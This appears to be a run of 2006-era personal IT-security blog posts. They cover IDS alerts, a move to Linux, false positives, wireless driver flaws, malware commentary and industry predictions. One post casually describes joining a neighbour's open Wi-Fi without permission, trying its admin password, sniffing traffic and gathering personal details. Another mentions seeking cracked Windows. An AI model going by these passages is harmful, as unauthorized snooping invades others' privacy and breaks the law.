Yes, we need to take this all back and let the vendors shout noise at each other in the ad-driven mags. We need to make doubly sure that all this noise doesn't blow in the face of our managers like so much thick hot air, sending them off to chase the next big thing and dragging us all with them whether it works or not.

At work my IDS popped up an alert that IP 123 performed a host sweep against our webservers on ports 80 and 443 (and maybe more, but the IDS is not that good...sigh). I check out the IP and it is a webserver for an NBA team. The website itself has little mention of how to contact someone about the site, but I do find an email in the privacy notice. Great. In the privacy notice I see a blurb about how the site is highly secure, blah blah. Great. So I sent an email to the legal address I see and get an immediate undeliverable message. Great.

By now, I have other things to be doing and so on, so I just drop the issue. This web site might be rooted, I might be seeing actual traffic from a malicious script, attacker, or something bad inside their network that I can't see. Perhaps it is legitimate traffic and someone is just spending some spare time scanning all websites on the Internets to help with the Google. But unless there are clear avenues to report these things, they can only hope their own internal detections will find if something is really wrong. :\

So, I have a VM of Windows XP running on my Ubuntu laptop now, so that I can do those few things that I need Windows for. Sadly, Windows and the Activation nag don't seem to be on the same page. No matter how many days I wait, it nags me that I have 30 days of activation left, but I am unable to activate my Windows either manually by inputting the key found on my laptop case. Well, as long as it stays perpetually on 30 days, that is at least tolerable, but I need to research why this happens and if I can fix it or redo the VM creation to alleviate the problem. I remember a popup warning about it when creating the VM, and I may have done something wrong.

Of note, the only thing I do on a daily basis that has not been moved over to Linux is my email from Thunderbird. I guess I could take some time and just move over, but it is all the older email that I need to wade through and catch up on first. I'll maybe just end up losing all that mailing list email I've built up...

Watching HOPE 6 presentations this weekend gave me more excuse to shore up Ubuntu's media-playing issues, including mp3 support. Very happy with XMMS and MPlayer.

An article just ran across my desk about a bank whose legitimate (albeit poorly implemented) email announcement to customers was mistaken for a phishing attempt. This is an example of a false positive. But just how damaging can a simple false positive be?

What we do now:
- automatic spam filters that "learn" what spam is
- manually populated spam filters
- spam blacklisting which can blacklist sources or content across a wide swath of customers
- heuristic and behavior-based virus scanning
- phishing site blacklisting
- blacklisting of DNS, domain, or IPs based on complaints or automatic alerts
- network and system shunning via IDS/IPS linked to firewalls

That's a lot of stuff reacting to security incidents. What might have happened to this company? Someone may have reported them to a phishing blacklister or alerts may have automatically done this, blocking perhaps the domain, emails, website IP, or even DNS for this bank. This could cost tons of money in lost business, public relations, and direct costs to fix or workaround the issue.

In a previous job, we sometimes were blocked from emailing AOL members because, after a complaint or two, AOL would block our email servers for 24 hours. The sad thing is, we never spammed people unless their own employer or they requested it or agreed to it. Also, one of our clients, a major financial institution at one point had their domain blacklisted for spamming. Now, they may have really been spamming, but due to that disruption in service by being placed on a blacklister, they had to change their domain name and all the infrastructure that it used. Wow!

And as much as people like this stuff, mistakes will still be made. People will make bad judgements, misconfigurations, or poor decisions like the bank email security campaign linked above. To make a mistake and cause your company millions is just a bad situation waiting to happen.

Dan Kaminsky was correct in his talks last year (BlackOps of TCP 2005) decribing how scary it is to have IDS/IPS automatically making firewall rules and shunning networks. This means that attackers can actually write your firewall rules and can do some things as disastrous as having your own network shun its own name servers and be subjected to DNS poisoning.

A quote from an ITBusiness article:

"You gotta be mobile, regardless. While it may pose great [security] risks, its a greater risk to fall behind," Levy said."

It goes without saying that you can't let your networks and systems linger and gather dust so much that we get another, "it's 2004, why are you still running Windows 98 systems?" situation. As support drops off, so to should use. Just look at SCADA systems on what not to do...

However, there is still something to be said about being on the forefront of technology and to not be sitting around playing catch-up five years behind or more. I think it could help IT perception if IT were closer to the forefront of technology and enabling and assisting employees more. This might be a bit dangerous in some cases, but I think in most cases the only real danger is just overspending on new things that may or may not work out in the long run. Thankfully, technology these days does not necessarily have to be a bad decision made that will last 20 years...or even 5 years. Everyone in business makes mistakes. IT should be held in no different regard. If we move forward with mobile devices before they become fully mainstream and it doesn't work out, so what?

I could go into a lot of the benefits and risks and goods and bads, but I think it is interesting to imagine the change in approach when it comes to just doing some things, and figuring out the security later. Perhaps this is a bad idea for most, but it is still something to always think about. Why wait 3 more years before encouraging mobility in the organization? Why not just do it now and deal with the risks, issues, and technology? Why wait for users to clamor louder for IM, and instead move forward with dealing with IM in the organization now?

Now, this is weird for me to be saying. I typically am not an early-adopter. But I do have an excuse. In college and beyond I have not had a very large amount of leisure money at my disposal in order to delve into new things. My attitude is certainly ready to change now that I am crawling out of debt such that I can see the edge clearly now.

Another quote from the same article:

"Levy suggested that access-based protections (like dual-function authentication) are imperative, and end-to-end encryption is necessary. These technical failsafes should form the foundation for rigorous employee training from the IT department, said Levy... The employees need to become experts in mobile security, he says."

I don't like this statement. I think the average user needs to get used to doing things with security in mind, but it is ridiculous to request that employees become experts in mobile security. Mobile security is tough enough for professionals working with it every day, let alone everyone else trying to do their own jobs. While training is necessary and employees do need to be at least a little bit security-conscious and accepting, it is up to technology and technology professionals to be the experts in security. We do not expect everyone to be an expert about the internal workings on their car or the proper use of complicated and ephemeral security measures. Instead, they just work, they just do their thing, and we take our cars to the professionals for anything beyond our control or understanding.

I almost always read "least privilege" or "least user access" and click into the article wondering what it will be. Without fail, it is always about that age-old discussion on whether users should be running as admins on their local machine or not.

What about the other aspect of least user privilege? Namely, the file servers. How are company file server resources allocated? How are requests for access to information handled? Not everything is in databases or web applications. So, what about this very important topic?

I wonder if this is because very few people understand the nuances of managing security permissions in anything but a tiny environment (at least, the IT journalists anyway). While it might seem easy to isolate developer files, what about when we start talking about collaboration or dynamic teams that span multiple departments?

Weird, considering I would expect many organizations to be very bad about tracking and reporting on actual user access or even managing that access at all.

We have a lot of denial about security in our society right now.

Many people will admit, sometimes after a few thoughts, that breaking into someone's house is typically not that hard. Watch "It Takes a Thief" on Discovery and you'll see that the same fundamental issues occur most of the time. But as much as people will grudgingly admit how easy it could be, that is typically just un-thinking lip service. Very few people, inside, admit they can be victimized. Very few people take the time to implement fundamental security measures that greatly impact the risks of a break-in. Something as simple as a security alarm and proper locks on doors. But yet, very few people do these things...and then shed tears and feel violated when they do suffer a break-in. Do we just like to pretend it won't happen to us? Or do we just not want to spend the money or the effort? Typically, all it takes to break into someone's house is a little bit of effort and some balls enough to overcome the internal sense of right and wrong.

Identity theft is still very easy to accomplish. But most people, while they will grudgingly admit that it is easy, still make little to no effort to protect themselves.

Security is often something that is talked about, but never truly taken seriously enough to change behaviors until after a security event. I would bet it is unanimous amongst people who have suffered a break-in that they wish they would have had more measures in place, and I bet most have them now.

At any rate, it is interesting that security can be something that sounds good when people talk about it, but they still too often end up doing nothing, and by that lack of action, end up denying that they can be victimized.

I was putting up a list of things to "predict" for next year, for my own amusement. It looks like one is coming true sooner than intended as the Month of Kernel Bugs has released a second wireless driver flaw along with Metasploit exploit.

There are three reasons this is huge right now: 1) lack of patching channels, 2) lack of hardened drivers, 3) and growing emphasis on mobility and wireless.

While Windows and other OS and software apps have various levels of seasoned updating and notifications, the driver community has no such luxury. In fact, neither do the corps who use hardware drivers like Dell, Gateway, HP, and so on. Customers are really on their own to know there is an issue, know how to find the right driver (still easier said than done on most of those sites), and install it properly (still sometimes a very arcane and archaic process).

This is a huge mess that isn't waiting to happen anymore; it's happening now. I now predict that 95% of all affected systems will not be patched until they are either rebuilt or retired to a garbage heap.

Second, drivers have long been relatively untouched in the media, and as such all their vulnerabilities and code issues have remained in the underground, if anywhere. But combine wireless proliferation, fuzzing, and virtualization, and it was just a matter of time before hardware drivers got the evil eye. Sadly, driverland is not ready for such attention, and I expect a lot of vulnerabilities to be exposed in the next few years in various hardware devices. The code is soft and not hardened over years of exploits and poking.

This is also important because of the growing prevalence of widespread wireless capabilities and laptops roaming around all over. And how default settings leave wireless network cards turned on. All it takes is a running laptop with an active wireless network card to be exploited. It doesn't even need to be associated with a network, and it can be rooted. It can then, possibly, spread.

I also predict there will be some wormable exploits popping up, but thankfully should only be problems in larger hotspots like airports or college campuses or muni-wifi implementations. However, this could still slowly spread from laptop to laptop in an apartment complex or metro area.

If we're in web 2.0 right now with Gmail, Ajax, Ruby, YouTube, Flickr, and so on, what was before that?

web 0.1 - The first web sites; not much to speak of, and I doubt any still exist.

web 0.5 - Around 1995-1998ish with the annoying proliferation of flaming torches, animated rainbow lines, embedded midi, and terrible design. GeoCities is a household name (albeit in geek households).

web 1.0 - Everyone can be a web designer, and designs actually started to mature and not look quite so "GeoCities." Embedded midi is out. Animated gif attacks are out. Stylesheets and databases are in.

web 2.0 - Not everyone can be a web designer. Programmers and extra-mile languages are taking over to offer full application-style sites. Objects are in, playing with code is out. The tools are sophisticated enough that web newbies don't need to code, they can click buttons, sliders, toggles, and otherwise drag-n-drop content.

So, where does MySpace fit in? The answer is, it doesn't. MySpace resembles web 0.5 with annoying embedded musics, terrible designs, and atrocious layouts. It really is a modern GeoCities (now, there are many people with very nice-looking sites, but random browsing on MySpace is an exercise in ugly).

But so many people and bands and groups are posting there and using them to host their official sites. This means that MySpace either needs a makeover to become Web 2.0 compliant, or someone will take that space over and offer exactly what MySpace offers, only easier, prettier, slicker, sexier, and modern. Considering the "ugly" stigma that MySpace has, getting people onto a new service that is better shouldn't be much harder than Google toppling Yahoo back when Yahoo went out of style and Google was "it."

This malware analysis is amazingly interesting to read. While not too deep, technically, this is the kind of analysis that is not really beyond any typical sysadmin or desktop support person.

A few points on why this is significant.

1) The malware is downloaded via social engineering someone to download a free codec in order to play some video. This is not atypical behavior, in fact, I see this every now and then on legitimate (non-porn) movies and happily go searching for codes or just let it auto-check and install. A typical user will be fooled by this attempt, as could any user searching for the codec randomly (if you need a divx codec, you hit divx.com, you don't randomly search for and install the myriad odd "divx" codecs from mysterious sites).

2) The malware took over the DNS queries of the system and even actively took over browsing targets in IE. It is possible this malware could return commands via DNS responses? It is definitely possible, as the analysis authors mentions (I really like when authors illustrate just how bad things could get with a piece of malware), that false DNS requests can be given. You want Windows Update? No, you want our site to download false Updates with more malware! I'd really like to see some packet captures of the results, if they are abnormal in any way.

3) Just goes to show that if malware can get you to execute a file on your system, that system is no longer your system.

Running malware in a virtual machine is common for researchers looking to examine the effects and even reverse engineer the malware. This presentation goes into some of the new techniques associated with malware detecting the use of a virtual machine in order to stop execution and prevent reversing. Of note, if we can have malware execution stopped by virtual machines, could end users be a bit safer by using desktop systems as virtual machines (with a thin client front end)? Or perhaps will malware be able to specifically sniff out and target virtual machines if some vulnerability were found in the, say, virtualized drivers?

This presentation discusses new techniques associated with malware detecting the use of a virtual machine. Researchers typically examine malware on virtual machines. If malware can detect use of a virtual machine and then prohibit execution, reverse engineering the malware becomes a little bit more difficult. Could this mean running a thin client connected to a desktop virtual machine might be more secure? Perhaps, but I think it will be more likely to result in some really bad malware should any of the virtual drivers or virtualization software have any vulnerabilities discovered. It is a bit disappointing still that the virtual machines can be detected (beyond just the drivers saying "vmware display driver," for instance. Then again, it might be asking a little too much to expect VMs to be indistinguishable from physical systems.

Just a couple ideas for office pranks on the managers.

1) Order up some jars or vases (the more magical or Alladin-like the better, add in cork tops too!) and fill them with colored sand. Either solid colors or even do that cool layering for a more rainbow-like effect. Keep the jars of sand on your desk and label them: "Malware cleaning," "speed booster," "erorr fixing." Then when your manager comes by asking about an error or problem on a server, wordlessly choose the appropriate jar of sand and disappear into the server room...

2) Get a bit of white sand or salt and make a line of it on a server room desk (I don't recommend in your cube in case someone reports you!) like it is a line of cocaine. When the manager finds it or walks in while you're slaving away on some important downtime, let your manager know that they're driving you so hard you have to do cocaine just to keep things running.

I took the time needed to get Thunderbird all set up with my email on my Linux install. This was very easy since I use Thunderbird on Windows and was already quite familiar with the app. Good times!

I still need to get my hands on a legit or properly cracked (and still working) version of Windows XP Pro so that I can finish my VM install. I really want this so that I can run a few random little things that I need to run in Windows (like Ventrilo).

Next on my list is to iron out mounting my external hard drive with write access. The drive is saved in NTFS, a Windows standard. While there are tools and ways for Linux to write to NTFS properly, there is still (after numerous years) disclaimers saying that the whole drive may still get hosed up. So I need to dig out another drive and perform a full backup of this external drive. I need to do this anyway as it has been a while since I backed it up. Either way, this shouldn't be a huge deal. Copy data over, install the NTFS tools on Ubuntu, mount the drive, test out write/delete/move functions. Done!

I also started playing with the new tools that Linux opens up to me. I installed kismet and played with it a bit, far deeper than I've ever played with it before on livecds like BackTrack. I even got to figure out how to edit shortcuts, the Gnome desktop layout, and application menus. More good times!

Sometimes I really get something in a bunch over the latest and greatest article that makes IT and IT security sound so easy on paper. I especially dislike reading about things like that from a journalist who may or may not even know how to implement and support the given steps and commentary. While I can't usually comment on their background and experience, sometimes it is pretty obvious when someone is writing about "good to haves" and "theoretical approaches" and "base-case scenarios." In reality, most companies will never match those steps.

Today's victim is an article on the 8 steps to a secure network found on zdnet.com.au.

1. Verify the current connections - Verifying the connections on the firewall is a good exercise, so that you know your common endpoints. Sadly, this works only in small networks that have tight control on installed software and desktops. In a large network, this will change too much to be of too much use. In networks that do not have tight controls, you can have a few instances of Skype that will constantly be running suspicious connections to various places in China, Taiwan, Iceland, Denmark, and so on. Investigating these is just an exercise in wishing for tighter desktop controls. It might be better to look for some common destination ports like 22, 21, or some others that would be suspicious.

2. Look at network traffic statistics - This is a good step, and any network admin should be pulling these stats or at least checking the latest numbers every morning. Sadly, this is usually the realm of a specialized network device or a Linux box doing some traffic analysis, two things beyond the reach of many admins. However, if the aptitude on the team is such to get good numbers, this is an excellent step.

3. Look at your antivirus logs - Centralized logs for host-based antivirus is either something a smaller network would love to have or unnecessary traffic storms on larger networks. Network-based antivirus may be better suited here, or something on a chokepoint like the email servers. Checking for updated signatures should be mandatory, but checking for captured viruses is less interesting. Not only that, but the logs won't tell you the more important information: what wasn't caught by the signatures.

4. Read the security logs on your domain servers - Reading Windows event logs, particular security logs, is about as bad a task as I can think of in IT and security. Hopefully anyone who has an interest in Windows security logs will be aggregating these somewhere and alerting when things like logon failures occur. If password policies are configured to properly lock out after 5 attempts and require admin intervention to unlock, this becomes moreorless a waste of time.

5. Check for new security patches - As much as I might take exception to most of these steps, I do like this one. Keep an inventory of important systems and software and do regular rounds of checks on security updates. This doesn't need to happen every day, however. And hopefully you are controlling and know what is on your network...if not, good luck in getting everything adequately patched.

6. Meet and brief managers - Most of the time, the above 5 steps aren't going to be terribly interesting. Step 1 might be interesting only because of the sheer number of "suspicious" connections that may or may not be around. Eventually this task will numb managers and the meets will turn informal and then non-existent. I think it would be more efficient to do this once a week.

7. Check more logs - Ok, I think this author is envisioning someone doing this job and only this job. All they do is check logs and security patches, kind of like a junior NOC operator or something. IDS/IPS logs should be checked, yes, but typically they are less useful than someone checking Snort or running some robust Linux tools for analysis.

8. Turn knowledge into action - This is a good step, but should be part of every piece mentioned above anyway. Take your information and work to either get better information, massage down the unnecessary information, implement changes like security patches, and research new tools to do all of these steps better.

conclusion - Over all, this sounds like a really cakewalk sort of job, and likely all that someone who followed these steps would be doing every day. Unfortunately, the reality is different and most admins seem to need to wear various hats or attend to other projects. These steps above are typically the first things to go when time is short. That's not ideal, but that's reality for most of us.

Andy has an awesome post about the realities of small business IT. IT infrastructure is expensive, let alone trying to implement IT in a secure and scalable and proper way. Also let alone trying to afford staff or consultants to support that IT and security. This puts pressure on individuals, small companies, and even mid-sized business to spend that sort of money or accept risks. This puts more emphasis on lightweight and open source tools. Which puts more emphasis on IT staff with those kinds of skills. Which puts more weight on paying their salaries.

As Andy says, even implementing the most basic things like backups can be difficult and painful.

Ahh, the continuing conundrums of IT security.

Locutus has an awesome post about what he feels makes a good IT professional, and I totally agree with him. Here is a quick summary in his presented order:

1) A passion for the work
2) Ability to solve problems and research solutions
3) Ability to solve problems and research solutions with time and organizational pressure

I like his first point the most, as it is what I call the "geek" trait. I'm a computer geek meaning work is also my hobby is also my enjoyment. My tinkering with technology does not stop at 5pm nor start at 8am. It bleeds into every part of my day and life for the most part.

This is the whole reason why I fight to have jobs where I can treat both "lives" as similar as possible. When at home, I don't wear a tie when ironing out a problem, so wearing one at work takes me out of my normal, and productive, state of comfort. (Not that I truly HATE it or something, it's just a little thing.) Likewise, I might have days where my productivity would be huge at home compared to at work, or at least huge when I'm happy. And if this is my hobby and what makes me happy, it follows to help me be happy at work so that I can be productive there as well.

Ok, end rant. :) I'm sure I'll complain about this until I actually have a job that doesn't require a tie 80%+ of the time...and even then wear one regularly.

Just read here some more unnecessary security terms. "Evil twins" is already better described as a rogue AP. And "wireless phishing" is just lame.

Please, unless the method is brand new, don't invent more terms for things that already have terms, for all our sakes.

Sometimes even I get some spam mail that makes me blink and think for a moment. I received an email about an order I didn't make on Newegg.com, a site that I frequent fairly regularly. The email came to my email account registered on the site, and had no links, only an attached .pdf.exe file. I even logged into Newegg.com just to make sure there were no purchases. I then checked the headers on the email that purportedly came from info@newegg.com and it instead came through an email server at bunsen.com, which forwards over to the official web site of The Muppets. In checking records, yup, the originating server appears to be part of the go.com network, which is part of Disney. But in checking my mail server logs, I see this email actually came from a system on a cable connection in Turkey.

While we talk a lot about security and how things can be circumvented and broken, rarely do we get down deep enough to talk about how trust is being affected.

I cannot trust the content of email.
I cannot trust the values in the email fields.
I cannot always trust the headers shown to me when I dig deeper.
I cannot trust the sender.
I possibly cannot trust Newegg.com with my info.
I might have distrusted The Muppets and Go.com and Disney.
I might not trust dns and whois information.
I might distrust foreign servers.

In the end, sometimes you can only wrap yourself in the comfort of the trust implicit in the protocols underneath the Internet, the logs of the devices and services offered...which is typically beyond the reach of your average user...

My move to Linux as my main computer system is about 80% done, I think. That figure does not include things that don't run in Linux, like Ventrilo, some games, and Soulseek (p2p network). But the rest is coming along nicely.

I can now rip new cds using Grip. I have installed XChat for some IRC socializing (I had no idea there was a Windows version of XChat...yeesh). I found that GAIM will support GoogleTalk (Jabber) although it won't do voice chat. And I've shored up some problems with Totem and Mplayer not being able to play some media files like WMV files.

Basically just ironing out lots of little issues and problems this weekend. My external (NTFS) drive still is a bit picky. Sometimes I can write/delete files, but sometimes some files just won't delete. I'm tempted to just run a backup of the data, format the drive in FAT32, and be done with it. I know I'm not really utilizing the powers of NTFS on it anyway, even in Windows. A thought to toss around...in the meantime, I'm becoming more familiar with mount/umount.

The "next year" predictions has begun. McAfee issued their list of top threats for 2007. While they are driving their own market, they also take the easy road and state the obvious. It reminds me of the Top 20 Attack Targets from FBI/SANS which covered just about every broad base in the digital world that you can. Great, talk about useless.

For my part, rather than just rehash the same old, I thought I would just issue out some thoughts I had for the coming year and beyond, by going out on just a little bit more of a limb than saying, "spam will rise."

convergence of culture on security policy - In the coming year and years we will see more of our digital culture permeating every aspect of our lives, and workplace policies will need to adjust or become obsolete or even barriers to getting good talent. Web filtering, Email filtering, IM controls, device restrictions, and the like will all be challenged as the Internet generation continues to fill more and more roles in the workplace and the digital lifestyle fills up and moves beyond just personal time. Companies need to embrace these changes and technologies now, instead of waiting until the pot boils over. It might be tough to properly handle IM, but it should be started now anyway. And dare I mention continued DRM and copyright troubles? Naa, that's obvious.

pockets of wireless driver exploits - The wireless world did not see huge gains this year in tech, but it did collectively hold its breath for news on wireless driver vulnerabilities. Granted, we had to wait longer than expected, but they are obviously present. And who updates drivers anyway? (Only three groups in Windows: gamers, people reinstalling their system [albeit usually from a disc], and us geeks...a vast minority of users...) Because of this, and the continued trend for municipalities to roll out widespread wireless access, I expect some pockets of wireless exploits to be had, whether it be a muni, airport, or university or corporate campus. Considering how deep the vulnerabilities get and how often people do not update their drivers, I expect something like this to be wormable, especially from an airport or location where the infected laptops migrate offsite. Issues like this might not be found out for days, when it is too late.

Managed security and IT takes a strong hold - More and more companies will realize that IT and security is expensive. It is difficult to manage, and even more frustrating for the professionals who know what to do but don't have the time to perform the needed tasks, or for the professionals who don't know what to do but have to take time to become experts. Ask any pro who has had to juggle their daily tasks while also researching the viability of blades and/or virtual systems. Suddenly you have to be an expert. Why do all this when this can be outsourced or at least managed by a third party. And as this continues, the industry will grow as well, by experiencing scales of economy and being able to best utilize expert knowledge and quality talent properly. Why should one awesome security pro manage only one client, when they might be able to effectively manage 5 with some extra hands to help? This is a classic fully mutual economic growth where companies will fuel this and providers will get better.

More disclosure debate - The disclosure debate will get hotter, especially just today with announcements of the Week of Oracle Bugs being cancelled due to some external pressures and Vista coming out. This debate will get ugly before it gets better, especially if something else comes out that really exposes government, critical infrastructures, or large swaths of people. And if people start exposing exploits, will someone finally sue for having spoken out about it? Should we pretend they don't exist until someone uses them and gets caught or detected? Hopefully this stays out of the mainstream media otherwise we're all in trouble.

laptop theft and data disclosure not going away - Ever since we've had laptops, we've had lost laptops and data on those laptops. The media keeps acting like this is some new amazing trend we've never seen before, but it is as old as the concept of possessions. This will not be going away because we continue to make laws to disclose losses, we get better at detecting and tracking these things, and the number of mobile devices and expectations of mobile work is still growing at a huge rate. I just hope the media stops reporting every single one, thus numbing everyone about it.

the rise of the browser - The web browser is already an over-powered computer application. It has become almost bigger than the OS itself, and will keep going until all you need is an OS and a web browser to access all you need. This is dangerous and illustrates how technology is pushed and pulled without regard to security. Web 2.0 has assured this.

the decline of the OS - The OS is slowly going to fall out of vogue. People hate upgrading and the insecurities, people don't want to pay money to have their known and accepted OS replaced with yet another interface that must be learned. And with the rise of the browser, there is a very real chance that security just gives up on the end system and moves security into the network. Next year will be a dangerous time for the OS and browser, and Vista right now holds the reins.

Mac will have malware - The Mac will finally get hit with some definitive malware, which can finally shut up all the Mac fan boys (my next laptop will be a Mac) who keep dodging around and protecting their precious "no malware on Mac" claims. This will occur next year, and we can all finally move on with life and get some great things done without this marketing zealotry always muddying the waters of the blogs and media.

Saturday saw me working most of the day on some productive stuff. On my test server I was finally able to install compatible and updated versions of Apache, MySQL, PHP, and Perl along with a new version of Movable Type. And I got it all to play nicely and properly render my website in full. Finally PHP and Apache2 ironed their issues out and I can proceed with my upgrades.

But this reminds me of the futility of trying to maintain a server and network in terms of security, and I don't even have all that much stuff installed.

My old server is a Windows 2000 Pro system that would have a 100% uptime if not for power outages and apartment moves (and update reboots). It runs MovableType1.2 I think, with 4 year old versions of PHP and Perl, a year old version of Blosxom, and Apache 1.3. I've not really updated the system itself in about 4+ years. That's heavy! And I'm a paranoid security guy who truly does know better!

Now, I will have updated versions of all of that, including a Wiki program. This means I need to keep up on:
- keeping my installs updated by applying any patches or security upgrades
- keeping my code secure by knowing how to program in a secure fashion
- remain an expert with all those technologies so that I know how to properly secure them
- for every update, be able to test it before putting into full production, or be able to spend time to recover when something royally screws up
- maintain resources for backing up the important stuff

My environment has two systems and a half dozen apps and a single OS version. And yet that's already a very big list of tasks up there. Just think how tough it is to be secure on a corporate level where every department has their own desires, software and web developers use their own systems to host things when they don't get their way on servers, and so on. It is no wonder that there are thousands of vulnerable forum sites out there running unupdated software. You can just wince when coming across an old forum site whose last 6000 posts are spam ads for Viagra.

Now, imagine turnover in the IT space. A 5-year vet of a company leaves and takes a heck of a lot of institutional knowledge with her. That might mean some systems have unknown software installed that no one else knows about, and no one else can manage. Imagine those things being used by someone for something critical, and by the time some issue arises, the company that created it (or internal developers) are no longer in business and support is not possible. Legacy is a very apt word for what we will go through as the years go by...legacy apps, systems, serers. It's not just hardware we need to worry about anymore, or bulky mainframes in basements.

Unless a corporation is very diligent and very controlling (which everyone resists vehemently), the application layer is becoming a lost battle. It is enough for IT divisions to attend to downtimes, connectivity, and failed hardware, let alone to stay abreast of the latest news on package Y or application X. And we can rest assured that we're also losing the battle of getting security packaged into software from the start.

As a side note, just think how much knowledge a tru security pro needs. Not only do I need to know how to install and secure Apache, but I need to know how to break it too. I also need to know what is bad in php (i.e. I need to know how to code it). I need to keep up with all those areas and updates. I need to have intimate knowledge not just of the OS, the apps, and the code, but the countless interactions between those two... Very, very heavy...

The first Syadmin of the Year awards have just been announced. While half the stuff said is likely embellished and it is just a little pat-on-the-back kind of site, I just thought it was interesting to see what these guys did that made their peers and co-workers nominate them.

I also would like to note that not one of them (with the Air Force exception) is wearing a tie to make them work better. Nor do any of them work for recognizable large-type corporations. These guys just plain "get things done" as opposed to running the gamut of business politics. And I would be willing to bet that every single one of these guys actually truly loves their job and company. Happiness == productive == successful.

I've seen a few "wide scope" posts lately about the state of security, but this one has some of the best points in it, and presents them very well. Mostly I just want to save this for my own use in the future.

Just one comment on it. Items 14 and 15 talk about how we cannot seem to agree, as a field, on best practices. Those posts are illustrated in item 2 on disclosure practices. Many of us understand both sides of the equation and even the grey area in between, but yet we still fall on all sides of the debate. Sometimes there is really no universally correct answer...especially in such a complex field as IT and security.

I made a few discoveries this weekend. First, a wireless access point has popped up in my neighborhood recently that is not encrypted, as a quick test of Netstumbler showed me. Second, my newest used laptop appears to be equipped with an Atheros card. Oh joy! I might just have to dual-boot that guy into Linux!

I hopped on the wireless network to poke around, but the Netgear AD password had been changed, and the one other system on the network was sending very few packets across. In fact, all the packets I picked up, with few exceptions, were not being decoded by Wireshark properly. They keep coming up as a Belkin MAC and something about broken packets. I'm wondering if this is something like a Netgear/Belkin combination using proprietary "speed-boosting" which is mucking up the packets. I fired up the newest Cain as well, just in case something interesting flew by.

I'm not really sure since I've not seen it before, but I've left the laptop on the network and will check it out over the next week or two. I do have an Internet connection through it. Windows Network Neighborhood gave me the computer name which happens to be a girl's name, and the AP SSID was a last name. Tonight I need to check what IP I have so I can get the service provider and IP to do some external testing, although I suspect I won't find anything useful. Given some Google searches and any possible traffic that I can decrypt, that is quite a bit of information to leak already.

At any rate, it is fun to have a spare system that I can just dedicate to wireless stuff. I've been wondering what to do with the system, as it is a little too big to properly carry anywhere (about 10 lbs and only fits in my backpack) for real portability, especially since I have far lighter systems. But now I think I have at least one use for it as a wireless workhorse.

I am often amazed at some of the solutions to security problems that some organizations and people implement. A mailing list situation recently came through that had a web-based system developed to "hide" the URL bar from users so they couldn't see and/or manipulate the URL. This is almost certainly to obfuscate sensitive data in the URL and possibly avoid risk from manipulating that data (the classic www.domain.com?price=199 variable which can be changed to change the actual price). Now IE7 is out which forces the URL to be displayed. Kind of defeats some of that purpose, no?

Other times there can be some very creative ways to deal with security issues. SMTP "security" can be achieved by capturing emails with "SSN" in the body and saving them on the mail server for pickup by the recipient party. This really does not fix anything in SMTP or email, but rather just changes the path of the missive. Sadly, this is usually pretty annoying from the recipient's point of view.

These are sometimes just patches and workarounds to the real, deep issues of security. In the first example, the app should have been rewritten to display a sanitized URL. In the second, figure out a better way to utilize email or try to re-invent SMTP (hard sell, that).

I've found that there is an endless supply of creative and work-around ideas in the field of security, and I think a large part of that is a function of the skill in the field. As more and more auditors (people who check lists...), non-geeks, and barely competent IT support persons move into this field, the talent and skill gets a little bit more and more watered down. Instead of understanding the nuances and/or realities of a tool, too often shallow knowledge gives way to sometimes ill-conceived workarounds and obfuscations of issues.

It truly does take a technical and deeper knowledge to effectively and quickly determine security responses and measures (or how to beat them). Someone cannot take a position to secure DNS without understanding how DNS works. Likewise, how do you secure applications that depend on DNS when you don't even know DNS itself?

Web applications are teeming with this issue. If a developer knows how to program security into the product on the fly and codes with security in mind, that is a huge benefit to the developer who only knows how to make the functionality work (sometimes in equally ill-conceived ways), but then has to spend tons of time trying to boly on security down the road. Knowledge would save time and money.

I think this is where a lot of bad security comes from, just a simple lack of expert level knowledge. This itself is tough to achieve anyway, as a security guru tends to be seen as a cost, not a value-add. They add value by also doing network/systems administration, which tends to trump security when push comes to shove.

And while budgets, poor management, poor decisions, and other things influence one's ability to be educated and/or implement solid security endeavors, I still think being an expert in the basics goes a long ways. Why implement an expensive NAC solution when you can drop in an old box running arpalert (free) and check for rogue machines that way? Why spend hundreds of manhours on limiting exposure of an application on the network when you can ensure your code can withstand fuzzing attacks?

This isn't the only reason we have insecurity, obviously. There are time issues and often pressures from outside the competent developer's control. And there is much to be said about defense in depth by doing everything one can to make a more secure product, but I still believe the basics are what comes first. The obfuscation needs to come after. The creative workarounds that could be obsolete next year need to be second.

The future is still going to remain with open source tools and creative ways of being an expert with the basics. Not on spendy and fancy workarounds that too often miss the real points of insecurity or create insecurity itself. Besides, even something as epidemic as XSS is not a difficult issue to either exploit (usually) or prevent. This is basic stuff that we're still struggling with.

(On a flip side, I find it equally as bad to be both complex and an expert in it, as that means only you have the knowledge to make things work...complexity begets complexity begets less security...)

There is more and more talk of people (typically people that just talk about things, i.e. analysts, as opposed to people who really *do* anything) wanting the ISPs to take up the battle against botnets and zombies. Personally, I feel that if ISPs are going to be forced into taking care of things closer to the end-user or that affect the end-user (either through detection and/or shunning after a threshhold), they're going to go balls-out and go farther than I, as a consumer, want them to go.

It is already difficult enough to shop around for an ISP that gives me a static IP (or at least very low turnover dynamic), allows me unfettered incoming and outgoing ports, and allows me to use my own mail and DNS servers as I see fit. I don't want that crap done for me. And I don't want to pay for business-class service. But if I were an ISP forced to go this route, forced to tackle a layer in the communications that I wasn't really supposed to tackle (this is like asking the physical layer to protect the sessions), I would make damn sure I log everything I can and get as far as I can and as thorough as I can before consumers start decying privacy issues and freedom of service. This is a ball I do not want to have started rolling.

Besides, I don't really think ISPs are going to dent that particular problem right now. I'd rather they were left to focus on what they do best, and provide me with uptime, reliability, and faster circuits. I don't want to have my system shunned (loss of reliability) because one of my neighbors can't stop visiting infested porn pages or out of the blue if it is my system affected.

But yes, I do think security will still head towards the switch, only the switch will be inside corporations and inside the user home.

Open source software is considered by many to be the untainted version of freeware available on the web. Far too often, "freeware" packages in other smaller programs, from announced installs like Google or Yahoo toolbars to unannounced installs like spyware and adware. Open source is a much, much more trusted "standard" for web surfers to download and install programs while sleeping easier at night.

But I wonder how long such trust will last. I download and install open source apps regularly, and in fact, unless I know the application well I don't install a closed source app when open source has alternatives. But do I look at the source code to check and make sure some spyware app isn't packaged inside it? How many other people compile the source themselves, let alone truly understand the code enough to feel safe? And if someone with programming knowledge does this, will he be able to let the rest of us know and "out" the application?

Right now we (I) have blind trust in something deemed open source, and maybe a little more trust in something open source available on SourceForge or through a package manager, but there will someday come a time when even open source is not safe from the little things installed by determined marketers. What if an application is only really "safe" if manually compiled from source, but the compiled binary version has small print in the EULA hiting at additional software...?

